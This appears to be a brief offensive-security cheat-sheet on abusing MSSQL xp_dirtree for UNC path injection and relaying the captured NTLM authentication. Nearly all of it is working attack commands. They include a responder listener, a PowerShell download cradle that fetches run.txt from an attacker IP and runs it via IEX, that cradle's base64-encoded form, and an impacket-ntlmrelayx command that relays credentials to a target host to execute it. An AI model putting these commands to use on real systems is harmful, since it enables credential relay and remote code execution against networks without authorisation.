UNC Path Injection
EXEC master..xp_dirtree \"\\\\192.168.119.120\\\\test\";sudo responder -I tap0Example NTLM Relaying with UNC
pwsh
$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.45.242/run.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText
KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIANAAyAC8AcgB1AG4ALgB0AHgAdAAnACkAIAB8ACAASQBFAFgAsudo proxychains impacket-ntlmrelayx --no-http-server -smb2support -t 172.16.229.152 -c 'powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIANAAyAC8AcgB1AG4ALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA'Last updated